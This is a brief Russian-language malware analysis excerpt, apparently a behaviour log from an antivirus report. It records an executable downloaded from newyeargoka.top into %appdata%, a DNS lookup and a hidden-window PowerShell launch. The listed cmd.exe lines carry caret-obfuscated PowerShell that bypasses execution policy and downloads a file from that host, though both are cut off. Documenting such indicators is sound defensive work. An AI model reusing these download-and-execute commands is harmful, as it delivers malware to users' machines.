Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^Wershell^.Exe -EX^e^cUTio^npO^LIcY ^by^p^asS ^-NO^PR^Of^IL^e -^WiNDOW^ST^yL^e^ ^h^Id^de^N (^n^Ew-^oBJ^ecT^ SYstEm.n^E^t.^W^eBC^lIen^t^).dO^Wnl^O^a^d^F^i^L^E('http://new...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "pO^Wershell^.Exe -EX^e^cUTio^npO^LIcY ^by^p^asS ^-NO^PR^Of^IL^e -^WiNDOW^ST^yL^e^ ^h^Id^de^N (^n^Ew-^oBJ^ecT^ SYstEm.n^E^t.^W^eBC^lIen^t^).dO^Wnl^O^a^d^F^i^L^E('http://new...' (со скрытым окном)